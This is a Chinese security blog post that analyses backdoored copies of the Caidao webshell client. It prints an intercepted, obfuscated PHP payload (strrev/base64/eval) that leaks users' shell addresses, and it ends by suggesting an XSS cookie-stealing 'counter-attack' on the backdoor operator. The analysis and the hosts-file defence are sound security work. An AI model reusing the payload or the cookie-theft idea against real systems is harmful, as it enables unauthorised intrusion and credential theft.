菜刀HTTP&TCP后门分析+防范

本文由掌控安全学院 - aj545302905 投稿
“菜刀”对于渗透测试者来说耳熟能详，但是大家用的菜刀真的安全吗？你能保证你所使用的工具不会被别人偷偷的塞入后门吗？

如果菜刀中被塞入后门 那我们岂不是成了别人的苦力。辛辛苦苦打下的shell就这样不知不觉的被别人窃取，怎能好意思说自己是一名”小黑客”呢!

所以我从网上分别找到两个带有HTTP后门及TCP后门的菜刀，教给大家如何去分析及防范提权工具中的后门。

一.HTTP后门菜刀

HTTP后门是最容易发现的后门了，我们只需要抓一个包，再对数据包的内容进行解密，及可得到幕后黑手的后门地址。
我们在本地phpstudy上写一个一句话木马，并且让带有后门的菜刀去链接我们的一句话hez.php，同时对后门菜刀进行抓包。
这里我们对第四个包进行分析，因为我们在包的内容里面发现了我们一句话木马的密码后面跟了一串URL编码的数据。

数据如下：

hackxxx=624_23Dstrrev%28edoced_46esab829%3B%4Beva128%24_%28%24_POST%5Bz8%5D%29%29% 3B&z0=QGU2YwwoYmFZZTY8K2RRUND1NU1UWYkoweDUnN1UuMFRNFOU1TbDdjNlYwWTISdnEybGxLQ2R
NZUd SbEp5d3hLUHRBWm1sc1pTz
25hSFIwY SRudkwZzZDNKeRRTGISZ1UwMa1ZTU31.U1JMR1ZSUK5UMDFIWU1NTZGRNaWNtvUdGenN6NG5NbXRs2UNna1qxQ1BUNUFwS1R8OScpKTtAaW5pX3NIdCgizGl2cGxheW91.
nJvcnMiLCIuIik7QHN1dF9Saw1
 lX2xpbw18KDAp08BzZXRFbWFnaWNFcXUudCUzX3J1bnRpbWUoNCk7ZWNobygiLT58Iik70gREPMRpcmn5hbWUOJF9TRUMRUJt
 I 1NDUk1QUF9GSUxFTkFNRSJdKT
tp2igkRD89TiIp4EQ9Z61ybnF t2SgkXI1NFU1HNYnNCcigkRCwwL DEpIT@iLyIpe22vcmUh2gocnF uZ2oIkEiLc.alikgYXMNgJEwpaWoaXNYZGlyKCJ7JEOi1pKSRSL j sieyRMFToi03 8kUi4911.0l jskdT oZnUU'3Rpb25fZXhpcBRzKCdwB3HpeF9nZXR1221kJykpPBBwb3NpeF9nzXRwd30pZChacG9zaXhf2208zX0pzCgpKTonJzskdXNyPSgkdSk%
 2FJHUbJ25hbWUnX

我们对数据进行url解码：
发现这里可以进行base64解码：

这里解码后我们发现还可以进行一次base64解码：

经过三次解码后，我们找到了后门的地址。

菜刀TCP后门：

这种后门就比较恶心了，因为通过单纯的抓包是不会被发现的。所以我们必须使用另一个工具对整个网路中的可执行程序进行监听。这里推荐使用Microsoft Network Monitor 3.4工具进行监听。PS：如果不能设置网卡 可以使用管理员身份打开。

新建工程后点击start开始监听，同时让带有TCP后门的菜刀链接自己的一句话木马。

我们发现我们的服务器向一个很可疑的网址发送了一堆TCP和HTTP数据包
对可疑网站的域名进行解析，发现对方IP为192.126.xxx.xxx PS：这并不是内网IP
对该IP进行查询 发现对方服务器在美国

于是我们再继续往下看，发现一条HTTP数据包

这里也不清楚问题出在哪，可能是被调试了吧~

那么我们已经知道我们的提权工具存在后门了 该怎样避免呢？

我们只需打开host文件 将里面的数据修改为127.0.01 "后门网址"

这样我们的电脑访问后门的时候 就相当于访问本机了，致使对方后门失效。

反杀：

我们再回过头来看第一个HTTP后门，发现后门地址后紧跟url传参。
反杀思路：我们是不是可以构造这样一条连接www.xxx.com?Url=<script>alert(1)</script>中间的js语句可以构造反弹cookie的代码，这样当对方登录的时候 是不是就可以窃取到cookie了呢？当然要考虑到对方服务器上是否开启拦截 是否有安全狗等问题……

申明：本公众号所分享内容仅用于网络安全技术讨论，切勿用于违法途径，

所有渗透都需获取授权，违者后果自行承担，与本号及作者无关，请谨记守法.

原文始发于微信公众号（掌控安全EDU）：菜刀HTTP&TCP后门分析+防范